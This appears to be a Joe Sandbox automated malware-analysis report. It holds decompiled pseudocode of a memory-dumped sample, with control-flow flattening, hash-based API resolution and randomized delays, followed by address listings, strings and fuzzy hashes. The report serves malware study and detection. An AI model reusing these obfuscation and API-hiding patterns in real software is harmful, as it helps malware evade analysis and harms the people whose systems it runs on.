				 *(_t177 + 0x10) =  *(_t177 + 0x10) ^ 0xe07bc090;
				 *(_t177 + 0x10) =  *(_t177 + 0x10) * 0x69;
				 *(_t177 + 0x10) =  *(_t177 + 0x10) << 1;
				 *(_t177 + 0x10) =  *(_t177 + 0x10) << 0xb;
				 *(_t177 + 0x10) =  *(_t177 + 0x10) ^ 0x0df2b000;
				 *(_t177 + 0x1c) = 0xac79;
				 *(_t177 + 0x1c) =  *(_t177 + 0x1c) << 1;
				 *(_t177 + 0x1c) =  *(_t177 + 0x1c) + 0x2d22;
				 *(_t177 + 0x1c) =  *(_t177 + 0x1c) ^ 0x00018615;
				goto L1;
				do {
					while(1) {
						L1:
						_t179 = _t164 - 0x2d3069ff;
						if(_t179 <= 0) {
							break;
						}
						if(_t164 == 0x342fd613) {
							_t160 =  *0x2cce2ec + 0x278;
							while( *_t160 != 0x5c) {
								_t160 = _t160 + 2;
							}
							_t158 = _t160 + 2;
							_t164 = 0x2685696e;
							continue;
						} else {
							if(_t164 != 0x37433c74) {
								goto L9;
							} else {
								_t164 = 0x194519ad;
								continue;
							}
						}
						L32:
					}
					if(_t179 == 0) {
						_t84 =  *0x2cce024;
						if(_t84 == 0) {
							_t84 = E02CC3E80(_t117, E02CC3F20(0xbb398380), 0x5262aefc, _t172);
							 *0x2cce024 = _t84;
						}
						_t85 =  *_t84(_t177 + 0x30);
						_t147 =  *0x2cce194;
						 *((intOrPtr*)(_t177 + 0x2c)) = 2 + _t85 * 2;
						if(_t147 == 0) {
							_t147 = E02CC3E80(_t117, E02CC3F20(0x667fdee), 0x1595373a, _t172);
							 *0x2cce194 = _t147;
						}
						_t89 =  *_t147( *((intOrPtr*)(_t177 + 0x3c)), _t158,  *(_t177 + 0x18),  *((intOrPtr*)(_t177 + 0x20)), _t177 + 0x30,  *((intOrPtr*)(_t177 + 0x2c)));
						_t164 = 0x1ff1a285;
						asm("sbb ebp, ebp");
						_t172 =  ~_t89 + 1;
						goto L1;
					} else {
						if(_t164 == 0x194519ad) {
							_t166 = E02CC34C0(0x2ccd8f0);
							_t91 =  *0x2ccdc60;
							if(_t91 == 0) {
								_t91 = E02CC3E80(_t117, E02CC3F20(0xe66945e6), 0xcca28b0d, _t172);
								 *0x2ccdc60 = _t91;
							}
							_t149 =  *0x2cce2ec;
							 *_t91(_t177 + 0x3c, 0x104, _t166, _t149 + 0x5c, _t149 + 0x278);
							_t93 =  *0x2ccdea8;
							_t177 = _t177 + 0x14;
							if(_t93 == 0) {
								_t93 = E02CC3E80(_t117, E02CC3F20(0xbb398380), 0x97f883e, _t172);
								 *0x2ccdea8 = _t93;
							}
							_t117 =  *_t93();
							_t95 =  *0x2cce1a0;
							if(_t95 == 0) {
								_t95 = E02CC3E80(_t117, E02CC3F20(0xbb398380), 0x26c3f343, _t172);
								 *0x2cce1a0 = _t95;
							}
							 *_t95(_t117, 0, _t166);
							_t164 = 0x342fd613;
							goto L1;
						} else {
							if(_t164 == 0x1ff1a285) {
								_t97 =  *0x2ccdfc4; // 0x0
								if(_t97 == 0) {
									_t97 = E02CC3E80(_t117, E02CC3F20(0x667fdee), 0x217c84a0, _t172);
									 *0x2ccdfc4 = _t97;
								}
								 *_t97( *((intOrPtr*)(_t177 + 0x28)));
								return _t172;
							} else {
								if(_t164 == 0x2685696e) {
									_t101 = E02CC34C0(0x2ccd960);
									_t152 =  *0x2ccdbec; // 0x0
									_t117 = _t101;
									if(_t152 == 0) {
										_t152 = E02CC3E80(_t117, E02CC3F20(0x667fdee), 0x7aac94ee, _t172);
										 *0x2ccdbec = _t152;
									}
									_t106 =  *_t152( *((intOrPtr*)(_t177 + 0x40)), _t117,  *((intOrPtr*)(_t177 + 0x34)), 0,  *(_t177 + 0x1c),  *(_t177 + 0x18), 0, _t177 + 0x28, 0);
									asm("sbb esi, esi");
									_t164 = ( ~_t106 & 0x09cffb0d) + 0x2d3069ff;
									E02CC3460(_t117);
								}
								goto L9;
							}
						}
					}
					goto L32;
					L9:
				} while (_t164 != 0x3700650c);
				return _t172;
				goto L32;
			}

0x02cc7746
0x02cc774e
0x02cc7756
0x02cc775e
0x02cc7766
0x02cc776b
0x02cc7773
0x02cc7780
0x02cc7784
0x02cc7788
0x02cc778a
0x02cc778f
0x02cc7794
0x02cc779c
0x02cc77a8
0x02cc77b1
0x02cc77b9
0x02cc77c1
0x02cc77c9
0x02cc77d1
0x02cc77d9
0x02cc77e1
0x02cc77e9
0x02cc77f4
0x02cc77fa
0x02cc77fe
0x02cc780b
0x02cc780f
0x02cc7813
0x02cc7818
0x02cc7820
0x02cc7828
0x02cc782c
0x02cc7834
0x02cc7834
0x02cc7840
0x02cc7840
0x02cc7840
0x02cc7840
0x02cc7846
0x00000000
0x00000000
0x02cc7a37
0x02cc7a55
0x02cc7a5f
0x02cc7a61
0x02cc7a64
0x02cc7a6a
0x02cc7a6d
0x00000000
0x02cc7a39
0x02cc7a3f
0x00000000
0x02cc7a45
0x02cc7a45
0x00000000
0x02cc7a45
0x02cc7a3f
0x00000000
0x02cc7a37
0x02cc784c
0x02cc79a7
0x02cc79ae
0x02cc79c1
0x02cc79c6
0x02cc79c6
0x02cc79d0
0x02cc79d2
0x02cc79df
0x02cc79e5
0x02cc79fd
0x02cc79ff
0x02cc79ff
0x02cc7a1e
0x02cc7a22
0x02cc7a29
0x02cc7a2b
0x00000000
0x02cc7852
0x02cc7858
0x02cc7904
0x02cc7906
0x02cc790d
0x02cc7920
0x02cc7925
0x02cc7925
0x02cc792a
0x02cc7946
0x02cc7948
0x02cc794d
0x02cc7952
0x02cc7965
0x02cc796a
0x02cc796a
0x02cc7971
0x02cc7973
0x02cc797a
0x02cc798d
0x02cc7992
0x02cc7992
0x02cc799b
0x02cc799d
0x00000000
0x02cc785e
0x02cc7864
0x02cc7a77
0x02cc7a7e
0x02cc7a91
0x02cc7a96
0x02cc7a96
0x02cc7a9f
0x02cc7aad
0x02cc786a
0x02cc7870
0x02cc7877
0x02cc787c
0x02cc7882
0x02cc7886
0x02cc789e
0x02cc78a0
0x02cc78a0
0x02cc78c6
0x02cc78ce
0x02cc78d6
0x02cc78dc
0x02cc78dc
0x00000000
0x02cc7870
0x02cc7864
0x02cc7858
0x00000000
0x02cc78e1
0x02cc78e1
0x02cc78f9
0x00000000

Strings

Ei, xrefs: 02CC790F
z}, xrefs: 02CC7773
"-, xrefs: 02CC782C
t<C7, xrefs: 02CC778F
t<C7, xrefs: 02CC7A39

Memory Dump Source

Source File: 00000000.00000002.663798235.0000000002CC1000.00000020.00000001.sdmp, Offset: 02CC0000, based on PE: true

Associated: 00000000.00000002.663785696.0000000002CC0000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.663834676.0000000002CCD000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.663856252.0000000002CCF000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2cc0000_boI88C399w.jbxd

Yara matches

Similarity

API ID:
String ID: "-$t<C7$t<C7$z}$Ei
API String ID: 0-1832362217
Opcode ID: cddb6831f1f82fedb86e8bce3f7d30230d5dd0591f7987ebff02f41c3074c13d
Instruction ID: f66d6251e23a54979b856b5df7e4b229367cb846a87b6c7f6b38471b89cd1821
Opcode Fuzzy Hash: cddb6831f1f82fedb86e8bce3f7d30230d5dd0591f7987ebff02f41c3074c13d
Instruction Fuzzy Hash: 5A81C171A083429FD354EF68E844A6BB7E6EBC4344F208A5DF45697244E770DA19CFC2

Uniqueness

Uniqueness Score: -1.00%

Function 02CC6530, Relevance: 5.6, Strings: 4, Instructions: 596
COMMONCrypto

Download Yara Rule

C-Code - Quality: 80%

			E02CC6530(void* __edx) {
				intOrPtr _v8;
				char _v16;
				char _v24;
				signed int _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				char _v48;
				char _v76;
				signed int _v80;
				char _v88;
				char _v96;
				char _v100;
				char _v104;
				char _v112;
				signed int _v120;
				signed int _v124;
				signed int _v128;
				void* __ebx;
				void* __ebp;
				void* _t198;
				void* _t200;
				signed int _t207;
				signed int _t209;
				signed int _t214;
				signed int _t220;
				void* _t222;
				void* _t223;
				void* _t224;
				signed int _t225;
				intOrPtr* _t227;
				signed int _t228;
				void* _t229;
				void* _t230;
				signed int _t234;
				signed int _t236;
				void* _t237;
				signed int _t240;
				intOrPtr* _t241;
				signed int _t242;
				void* _t243;
				void* _t244;
				signed int _t249;
				void* _t254;
				signed int _t255;
				intOrPtr* _t256;
				void* _t257;
				intOrPtr* _t258;
				signed int _t259;
				void* _t260;
				signed int _t272;
				signed int _t274;
				void* _t276;
				signed int _t280;
				signed int _t285;
				intOrPtr* _t287;
				signed int _t293;
				signed int _t300;
				signed int _t304;
				intOrPtr _t308;
				signed int _t318;
				signed int _t347;
				signed int _t348;
				signed int _t369;
				signed int _t371;
				void* _t375;
				signed int _t385;
				signed int _t391;
				signed int _t396;
				void* _t398;
				void* _t400;
				void* _t401;
				void* _t402;
				void* _t403;

				_t398 = (_t396 & 0xfffffff8) - 0x80;
				_t300 = _v120;
				_t191 = 0x12823d32;
				_t391 = _v124;
				while(1) {
					L1:
					_t375 = 0x2564be4f;
					do {
						while(1) {
							L2:
							_t400 = _t191 - 0x1ff46034;
							if(_t400 > 0) {
								goto L60;
							}
							L3:
							if(_t400 == 0) {
								return E02CCB160();
							} else {
								_t401 = _t191 - 0xfd5a1ac;
								if(_t401 > 0) {
									__eflags = _t191 - 0x16bf64f2;
									if(__eflags > 0) {
										__eflags = _t191 - 0x1ea773fc;
										if(__eflags > 0) {
											__eflags = _t191 - 0x1fdef138;
											if(_t191 != 0x1fdef138) {
												break;
											} else {
												_v8 =  *((intOrPtr*)( *0x2cce2ec + 0x48));
												_t191 = 0x1ea773fc;
												continue;
											}
										} else {
											if(__eflags == 0) {
												_v40 = E02CC5360(_t300, _t391);
												_t191 = 0x216a974b;
												continue;
											} else {
												__eflags = _t191 - 0x1c32e2d2;
												if(_t191 == 0x1c32e2d2) {
													E02CC4250(_t300, _v112);
													_t191 = 0x39deb3f9;
													continue;
												} else {
													__eflags = _t191 - 0x1c5e7f9f;
													if(_t191 != 0x1c5e7f9f) {
														break;
													} else {
														_t191 = 0x30d1bd42;
														continue;
													}
												}
											}
										}
									} else {
										if(__eflags == 0) {
											_t272 = E02CC5F60( &_v76, _t347, _t391);
											__eflags = _t272;
											if(_t272 == 0) {
												L77:
												_t191 = 0x1ff46034;
											} else {
												_v48 =  &_v76;
												_t274 =  *0x2cce144;
												__eflags = _t274;
												if(_t274 == 0) {
													_t276 = E02CC3F20(0xbb398380);
													_t347 = 0x5262aeca;
													_t274 = E02CC3E80(_t300, _t276, 0x5262aeca, _t391);
													 *0x2cce144 = _t274;
												}
												_t327 =  &_v76;
												_v48 =  *_t274( &_v76);
												_t191 = 0x1fdef138;
											}
											continue;
										} else {
											__eflags = _t191 - 0x14860a92;
											if(__eflags > 0) {
												__eflags = _t191 - 0x166b1152;
												if(_t191 != 0x166b1152) {
													break;
												} else {
													E02CC8EA0();
													_t191 = 0x1381dc55;
													continue;
												}
											} else {
												if(__eflags == 0) {
													E02CC8550(_t300);
													_t191 = 0x2aa5d516;
													continue;
												} else {
													__eflags = _t191 - 0x12823d32;
													if(_t191 == 0x12823d32) {
														_t191 = 0x27047861;
														continue;
													} else {
														__eflags = _t191 - 0x1381dc55;
														if(_t191 != 0x1381dc55) {
															break;
														} else {
															E02CC9470(_t391);
															_t191 = 0x315a7589;
															continue;
														}
													}
												}
											}
										}
									}
								} else {
									if(_t401 == 0) {
										_t280 = E02CC90C0();
										asm("sbb eax, eax");
										_t191 = ( ~_t280 & 0x0810ea45) + 0xb70f210;
										continue;
									} else {
										_t402 = _t191 - 0xd28318f;
										if(_t402 > 0) {
											__eflags = _t191 - 0xe9d6a0f;
											if(__eflags > 0) {
												__eflags = _t191 - 0xf0c159c;
												if(_t191 != 0xf0c159c) {
													break;
												} else {
													_t209 = E02CC96B0();
													__eflags = _t209;
													if(_t209 == 0) {
														L142:
														return _t209;
													} else {
														_t191 = 0xfd5a1ac;
														continue;
													}
												}
											} else {
												if(__eflags == 0) {
													E02CC7EC0();
													__eflags =  *( *0x2cce2ec + 0x268);
													_t191 =  !=  ? 0x21c0adc4 : 0x14860a92;
													continue;
												} else {
													__eflags = _t191 - 0xddcb99d;
													if(_t191 == 0xddcb99d) {
														_t285 = E02CCB2B0( &_v88, _t391);
														__eflags = _t285;
														if(_t285 != 0) {
															asm("xorps xmm0, xmm0");
															_t391 = 0x8e1a01c;
															asm("movlpd [esp+0x18], xmm0");
															_t300 = _v120;
														}
														L30:
														_t191 = 0xa28b6e5;
														continue;
													} else {
														__eflags = _t191 - 0xe0d6cd8;
														if(_t191 != 0xe0d6cd8) {
															break;
														} else {
															E02CC9D70(_t300);
															_t347 = 0xcfd93ac1;
															_t391 = 0x1c5e7f9f;
															_t287 = E02CC4190(_t300, 0xbb398380, 0xcfd93ac1, 0x1c5e7f9f, 0xcf);
															_t398 = _t398 + 4;
															 *_t287();
															_t300 = 0xcfd93ac1;
															L27:
															_t191 = 0x2537e9de;
															continue;
														}
													}
												}
											}
										} else {
											if(_t402 == 0) {
												_v124 = 0x669c;
												_t347 = 0xcccccccd * _v124 >> 0x20 >> 5;
												_v124 = _t347;
												_v124 = _v124 ^ 0x00000178;
												_v28 = _v124;
												_t191 = 0x8e1a01c;
												continue;
											} else {
												_t403 = _t191 - 0x8e1a01c;
												if(_t403 > 0) {
													__eflags = _t191 - 0xa28b6e5;
													if(_t191 == 0xa28b6e5) {
														E02CC4250(_t300, _v96);
														_t191 = 0x1c32e2d2;
														continue;
													} else {
														__eflags = _t191 - 0xb70f210;
														if(_t191 != 0xb70f210) {
															break;
														} else {
															_t293 = E02CC8240(_t300, _t391);
															_t308 =  *0x2cce2ec;
															__eflags = _t293;
															if(_t293 == 0) {
																__eflags =  *(_t308 + 0x268);
																_t191 =  !=  ? 0x3278b521 : 0x166b1152;
															} else {
																__eflags =  *(_t308 + 0x268);
																_t191 =  !=  ? _t375 : 0xe0d6cd8;
															}
															continue;
														}
													}
												} else {
													if(_t403 == 0) {
														E02CC60E0( &_v24);
														_t191 = 0x4326e25;
														while(1) {
															L2:
															_t400 = _t191 - 0x1ff46034;
															if(_t400 > 0) {
																goto L60;
															}
															goto L3;
														}
														goto L60;
													} else {
														if(_t191 == 0x2c8787f) {
															E02CC8530();
															_t191 = 0xddcb99d;
															while(1) {
																L2:
																_t400 = _t191 - 0x1ff46034;
																if(_t400 > 0) {
																	goto L60;
																}
																goto L3;
															}
														} else {
															if(_t191 != 0x4326e25) {
																break;
															} else {
																E02CCB050( &_v16);
																_t191 = 0x2b42ebb2;
																while(1) {
																	L2:
																	_t400 = _t191 - 0x1ff46034;
																	if(_t400 > 0) {
																		goto L60;
																	}
																	goto L3;
																}
															}
														}
													}
												}
											}
										}
									}
								}
							}
							L143:
							L60:
							__eflags = _t191 - 0x2b42ebb2;
							if(__eflags > 0) {
								__eflags = _t191 - 0x3299e430;
								if(__eflags > 0) {
									__eflags = _t191 - 0x39deb3f9;
									if(__eflags > 0) {
										__eflags = _t191 - 0x39f8f5db;
										if(_t191 != 0x39f8f5db) {
											break;
										} else {
											_v124 = 0xaaf5;
											_t391 = 0x16bf64f2;
											_v124 = _v124 >> 3;
											_v124 = _v124 + 0xffff9253;
											_v124 = _v124 ^ 0xffff9931;
											_v128 = 0xf5b3;
											_v128 = _v128 + 0xb403;
											_v128 = _v128 + 0xffff5bc8;
											_v128 = _v128 + 0x6fbb;
											_v128 = _v128 + 0xe315;
											_v128 = _v128 | 0x5d55179d;
											_v128 = _v128 + 0xafac;
											_v128 = _v128 << 2;
											_v128 = _v128 ^ 0x7560216c;
											_t157 =  &_v128; // 0x7560216c
											__eflags = _v124 -  *_t157;
											if(_v124 <=  *_t157) {
												__eflags = 0;
											} else {
												_t348 =  *0x2ccdd4c;
												__eflags = _t348;
												if(_t348 == 0) {
													_t348 = E02CC3E80(_t300, E02CC3F20(0xbb398380), 0xae3c1a47, 0x16bf64f2);
													 *0x2ccdd4c = _t348;
												}
												_v124 = 0xaaf5;
												_v124 = _v124 >> 3;
												_v124 = _v124 + 0xffff9253;
												_v124 = _v124 ^ 0xffff9931;
												_t200 = E02CC5E10();
												_t347 =  *_t348() % (_v124 - _t200);
											}
											_t318 =  *0x2ccddbc; // 0x0
											__eflags = _t318;
											if(_t318 == 0) {
												_t198 = E02CC3F20(0xbb398380);
												_t347 = 0xcfd93ac1;
												_t318 = E02CC3E80(_t300, _t198, 0xcfd93ac1, _t391);
												 *0x2ccddbc = _t318;
											}
											_v128 = 0xf5b3;
											_v128 = _v128 + 0xb403;
											_v128 = _v128 + 0xffff5bc8;
											_v128 = _v128 + 0x6fbb;
											_v128 = _v128 + 0xe315;
											_v128 = _v128 | 0x5d55179d;
											_v128 = _v128 + 0xafac;
											_v128 = _v128 << 2;
											_v128 = _v128 ^ 0x7560216c;
											 *_t318();
											_t300 = _t347;
											_t191 = 0x2537e9de;
											asm("adc ebx, 0x0");
											goto L1;
										}
									} else {
										if(__eflags == 0) {
											E02CC4250(_t300, _v16);
											_t191 = 0x3540656b;
											continue;
										} else {
											__eflags = _t191 - 0x3540656b;
											if(_t191 == 0x3540656b) {
												E02CC4250(_t300, _v24);
												_t191 = 0x2537e9de;
												continue;
											} else {
												__eflags = _t191 - 0x380a1784;
												if(_t191 != 0x380a1784) {
													break;
												} else {
													_t347 =  &_v88;
													_t207 = E02CC74E0( &_v96, _t347);
													__eflags = _t207;
													if(_t207 == 0) {
														goto L30;
													} else {
														E02CCAE60(0);
														_t327 = _v80;
														_t191 = 0x2c8787f;
														__eflags = _t327;
														if(_t327 != 0) {
															__eflags = _t327 - 7;
															_t327 = 0x3299e430;
															_t191 =  ==  ? 0x3299e430 : 0x2c8787f;
														}
													}
													continue;
												}
											}
										}
									}
								} else {
									if(__eflags == 0) {
										_t209 = E02CC8590(_t391);
										goto L142;
									} else {
										__eflags = _t191 - 0x315a7589;
										if(__eflags > 0) {
											__eflags = _t191 - 0x3278b521;
											if(_t191 != 0x3278b521) {
												break;
											} else {
												E02CC8CD0();
												_t191 = 0x166b1152;
												continue;
											}
										} else {
											if(__eflags == 0) {
												_t209 = E02CC8A10();
												__eflags = _t209;
												if(_t209 == 0) {
													goto L142;
												} else {
													_t191 = 0xe9d6a0f;
													continue;
												}
											} else {
												__eflags = _t191 - 0x30d1bd42;
												if(_t191 == 0x30d1bd42) {
													_t347 =  &_v100;
													_v104 = E02CC3310(0x2ccd2e0, _t347);
													E02CC1890( &_v104);
													E02CC3460(_t211);
													_t191 = 0x314203dc;
													while(1) {
														L1:
														_t375 = 0x2564be4f;
														goto L2;
													}
												} else {
													__eflags = _t191 - 0x314203dc;
													if(_t191 != 0x314203dc) {
														break;
													} else {
														_t191 = 0x39f8f5db;
														continue;
													}
												}
											}
										}
									}
								}
							} else {
								if(__eflags == 0) {
									_t347 =  &_v112;
									_t327 =  &_v48;
									_t214 = E02CC72A0( &_v48, _t347);
									asm("sbb eax, eax");
									_t191 = ( ~_t214 & 0xf0f0f5bd) + 0x39deb3f9;
									continue;
								} else {
									__eflags = _t191 - 0x2564be4f;
									if(__eflags > 0) {
										__eflags = _t191 - 0x2aa5d516;
										if(__eflags > 0) {
											__eflags = _t191 - 0x2acfa9b6;
											if(_t191 != 0x2acfa9b6) {
												break;
											} else {
												_v128 = 0xe36c;
												_t347 =  &_v112;
												_v128 = _v128 * 0x71;
												_v128 = _v128 + 0xffff86a2;
												_v128 = _v128 * 0x7b;
												_v128 = _v128 >> 6;
												_v128 = _v128 | 0x57610b65;
												_v128 = _v128 ^ 0x57e10f64;
												_t220 = E02CC12B0(_v128, _t347,  &_v96);
												_t398 = _t398 + 4;
												__eflags = _t220;
												if(_t220 == 0) {
													_t327 =  *0x2cce2e0;
													 *(_t327 + 0xc) =  &(( *(_t327 + 0xc))[2]);
													__eflags =  *( *(_t327 + 0xc));
													if( *( *(_t327 + 0xc)) == 0) {
														 *(_t327 + 0xc) =  *(_t327 + 8);
													}
													_v128 = 0xc5a1;
													_t391 = 0x8e1a01c;
													_v128 = _v128 ^ 0xe0738efa;
													_v128 = _v128 >> 6;
													_v128 = _v128 + 0xffffe737;
													_v128 = _v128 ^ 0x0381bbc4;
													_t222 = E02CC5D50();
													__eflags = _v128 - _t222;
													if(_v128 <= _t222) {
														_t304 = 0;
														__eflags = 0;
													} else {
														_t227 = E02CC4190(_t300, 0xbb398380, 0xae3c1a47, 0x8e1a01c, 0xb3);
														_t398 = _t398 + 4;
														_t228 =  *_t227();
														_t229 = E02CC5D50();
														_t230 = E02CC5D20();
														_t327 = _t230 - _t229;
														_t347 = _t228 % (_t230 - _t229);
														_t304 = _t347;
													}
													_t369 =  *0x2ccddbc; // 0x0
													__eflags = _t369;
													if(_t369 == 0) {
														_t225 = E02CC3F20(0xbb398380);
														_t347 = 0xcfd93ac1;
														_t327 = _t225;
														_t369 = E02CC3E80(_t304, _t225, 0xcfd93ac1, _t391);
														 *0x2ccddbc = _t369;
													}
													_t223 = E02CC5D50();
													_t224 =  *_t369();
													_t300 = _t347;
													_t371 = _t224 + _t304 + _t223;
													_t191 = 0x1c32e2d2;
													asm("adc ebx, 0x0");
												} else {
													_v124 = 0xb2e0;
													_t391 = 0x8e1a01c;
													_t234 = _v124;
													_t327 = (_t234 << 4) - _t234 << 2;
													_v124 = (_t234 << 4) - _t234 << 2;
													_v124 = _v124 ^ 0x00245720;
													_v128 = 0x89fa;
													_v128 = _v128 + 0xffffb442;
													_v128 = _v128 + 0xffffdaaf;
													_v128 = _v128 >> 0xb;
													_v128 = _v128 ^ 0x000c3503;
													__eflags = _v124 - _v128;
													if(_v124 <= _v128) {
														_t385 = 0;
														__eflags = 0;
													} else {
														_t241 = E02CC4190(_t300, 0xbb398380, 0xae3c1a47, 0x8e1a01c, 0xb3);
														_t398 = _t398 + 4;
														_t242 =  *_t241();
														_t243 = E02CC5DC0();
														_t244 = E02CC5D90();
														_t327 = _t244 - _t243;
														_t347 = _t242 % (_t244 - _t243);
														_t385 = _t347;
													}
													_t236 =  *0x2ccddbc; // 0x0
													__eflags = _t236;
													if(_t236 == 0) {
														_t240 = E02CC3F20(0xbb398380);
														_t347 = 0xcfd93ac1;
														_t327 = _t240;
														_t236 = E02CC3E80(_t300, _t240, 0xcfd93ac1, _t391);
														 *0x2ccddbc = _t236;
													}
													_v128 = 0x89fa;
													_v128 = _v128 + 0xffffb442;
													_v128 = _v128 + 0xffffdaaf;
													_v128 = _v128 >> 0xb;
													_v128 = _v128 ^ 0x000c3503;
													_t237 =  *_t236();
													_t300 = _t347;
													_t371 = _t237 + _v128 + _t385;
													_t191 = 0x380a1784;
													asm("adc ebx, 0x0");
												}
												while(1) {
													L1:
													_t375 = 0x2564be4f;
													goto L2;
												}
											}
										} else {
											if(__eflags == 0) {
												return E02CC8BA0(_t327, _t391);
											} else {
												__eflags = _t191 - 0x27047861;
												if(_t191 == 0x27047861) {
													_t209 = E02CC7160(_t300);
													__eflags = _t209;
													if(_t209 == 0) {
														goto L142;
													} else {
														_t191 = 0x226f6c18;
														continue;
													}
												} else {
													__eflags = _t191 - 0x27dc0a4c;
													if(_t191 != 0x27dc0a4c) {
														break;
													} else {
														_v32 = E02CC5EA0();
														_t191 = 0xd28318f;
														continue;
													}
												}
											}
										}
									} else {
										if(__eflags == 0) {
											_t249 = E02CC9320(_t391);
											asm("sbb eax, eax");
											_t191 = ( ~_t249 & 0x1c98683e) + 0xe0d6cd8;
											continue;
										} else {
											__eflags = _t191 - 0x226f6c18;
											if(__eflags > 0) {
												__eflags = _t191 - 0x2537e9de;
												if(_t191 != 0x2537e9de) {
													break;
												} else {
													__eflags = _t371 | _t300;
													if((_t371 | _t300) == 0) {
														L81:
														_t191 = _t391;
														break;
													} else {
														_v128 = 0x1f9e;
														_v128 = _v128 >> 0xc;
														_v128 = _v128 + 0xffff30c3;
														_v128 = _v128 ^ 0xffff3064;
														_t254 = E02CC5CD0();
														__eflags = _t254 - _v128;
														if(_t254 <= _v128) {
															_t347 = 0;
															__eflags = 0;
														} else {
															_t258 = E02CC4190(_t300, 0xbb398380, 0xae3c1a47, _t391, 0xb3);
															_t398 = _t398 + 4;
															_t259 =  *_t258();
															_t260 = E02CC5CD0();
															_t347 = _t259 % (_t260 - E02CC5D00());
															_t375 = 0x2564be4f;
														}
														_v128 = 0x1f9e;
														_v128 = _v128 >> 0xc;
														_v128 = _v128 + 0xffff30c3;
														_v128 = _v128 ^ 0xffff3064;
														_t327 = _v128 + _t347;
														_t255 = E02CC9EA0(_t300, _v128 + _t347);
														__eflags = _t255;
														if(_t255 == 0) {
															_t347 = 0xcfd93ac1;
															_t327 = 0xbb398380;
															_t256 = E02CC4190(_t300, 0xbb398380, 0xcfd93ac1, _t391, 0xcf);
															_t398 = _t398 + 4;
															_t257 =  *_t256();
															__eflags = 0xcfd93ac1 - _t300;
															if(__eflags < 0) {
																goto L27;
															} else {
																if(__eflags > 0) {
																	goto L81;
																} else {
																	__eflags = _t257 - _t371;
																	if(_t257 < _t371) {
																		goto L27;
																	} else {
																		goto L81;
																	}
																}
															}
														} else {
															goto L77;
														}
													}
												}
											} else {
												if(__eflags == 0) {
													E02CC6FB0(_t300);
													_t191 = 0xf0c159c;
													continue;
												} else {
													__eflags = _t191 - 0x216a974b;
													if(_t191 == 0x216a974b) {
														_v36 = E02CC47A0(_t300, _t391);
														_t191 = 0x27dc0a4c;
														continue;
													} else {
														__eflags = _t191 - 0x21c0adc4;
														if(_t191 != 0x21c0adc4) {
															break;
														} else {
															E02CC87D0();
															_t191 = 0x14860a92;
															continue;
														}
													}
												}
											}
										}
									}
								}
							}
							goto L143;
						}
						__eflags = _t191 - 0x33f417f9;
					} while (_t191 != 0x33f417f9);
					return _t191;
					goto L143;
				}
			}

0x02cc6536
0x02cc653d
0x02cc6541
0x02cc6547
0x02cc6551
0x02cc6551
0x02cc6551
0x02cc6560
0x02cc6560
0x02cc6560
0x02cc6560
0x02cc6565
0x00000000
0x00000000
0x02cc656b
0x02cc656b
0x02cc6ef5
0x02cc6571
0x02cc6571
0x02cc6576
0x02cc674d
0x02cc6752
0x02cc6809
0x02cc680e
0x02cc6854
0x02cc6859
0x00000000
0x02cc685f
0x02cc6867
0x02cc686e
0x00000000
0x02cc686e
0x02cc6810
0x02cc6810
0x02cc6846
0x02cc684a
0x00000000
0x02cc6812
0x02cc6812
0x02cc6817
0x02cc6832
0x02cc6837
0x00000000
0x02cc6819
0x02cc6819
0x02cc681e
0x00000000
0x02cc6824
0x02cc6824
0x00000000
0x02cc6824
0x02cc681e
0x02cc6817
0x02cc6810
0x02cc6758
0x02cc6758
0x02cc67bb
0x02cc67c0
0x02cc67c2
0x02cc6987
0x02cc6987
0x02cc67c8
0x02cc67cc
0x02cc67d0
0x02cc67d5
0x02cc67d7
0x02cc67de
0x02cc67e3
0x02cc67ea
0x02cc67ef
0x02cc67ef
0x02cc67f4
0x02cc67fb
0x02cc67ff
0x02cc67ff
0x00000000
0x02cc675a
0x02cc675a
0x02cc675f
0x02cc679d
0x02cc67a2
0x00000000
0x02cc67a8
0x02cc67a8
0x02cc67ad
0x00000000
0x02cc67ad
0x02cc6761
0x02cc6761
0x02cc678e
0x02cc6793
0x00000000
0x02cc6763
0x02cc6763
0x02cc6768
0x02cc6784
0x00000000
0x02cc676a
0x02cc676a
0x02cc676f
0x00000000
0x02cc6775
0x02cc6775
0x02cc677a
0x00000000
0x02cc677a
0x02cc676f
0x02cc6768
0x02cc6761
0x02cc675f
0x02cc6758
0x02cc657c
0x02cc657c
0x02cc6735
0x02cc673c
0x02cc6743
0x00000000
0x02cc6582
0x02cc6582
0x02cc6587
0x02cc6672
0x02cc6677
0x02cc6713
0x02cc6718
0x00000000
0x02cc671e
0x02cc671e
0x02cc6723
0x02cc6725
0x02cc6f08
0x02cc6f0f
0x02cc672b
0x02cc672b
0x00000000
0x02cc672b
0x02cc6725
0x02cc667d
0x02cc667d
0x02cc66ef
0x02cc66ff
0x02cc670b
0x00000000
0x02cc667f
0x02cc667f
0x02cc6684
0x02cc66c6
0x02cc66cb
0x02cc66cd
0x02cc66cf
0x02cc66d2
0x02cc66d7
0x02cc66dd
0x02cc66e1
0x02cc66e5
0x02cc66e5
0x00000000
0x02cc6686
0x02cc6686
0x02cc668b
0x00000000
0x02cc6691
0x02cc6691
0x02cc669b
0x02cc66a5
0x02cc66aa
0x02cc66af
0x02cc66b2
0x02cc66b6
0x02cc66b8
0x02cc66b8
0x00000000
0x02cc66b8
0x02cc668b
0x02cc6684
0x02cc667d
0x02cc658d
0x02cc658d
0x02cc663e
0x02cc6651
0x02cc6654
0x02cc6658
0x02cc6664
0x02cc6668
0x00000000
0x02cc6593
0x02cc6593
0x02cc6598
0x02cc65dd
0x02cc65e2
0x02cc662f
0x02cc6634
0x00000000
0x02cc65e4
0x02cc65e4
0x02cc65e9
0x00000000
0x02cc65ef
0x02cc65ef
0x02cc65f4
0x02cc65fa
0x02cc65fc
0x02cc6612
0x02cc6623
0x02cc65fe
0x02cc65fe
0x02cc660a
0x02cc660a
0x00000000
0x02cc65fc
0x02cc65e9
0x02cc659a
0x02cc659a
0x02cc65d1
0x02cc65d6
0x02cc6560
0x02cc6560
0x02cc6560
0x02cc6565
0x00000000
0x00000000
0x00000000
0x02cc6565
0x00000000
0x02cc659c
0x02cc65a1
0x02cc65c1
0x02cc65c6
0x02cc6560
0x02cc6560
0x02cc6560
0x02cc6565
0x00000000
0x00000000
0x00000000
0x02cc6565
0x02cc65a3
0x02cc65a8
0x00000000
0x02cc65ae
0x02cc65b5
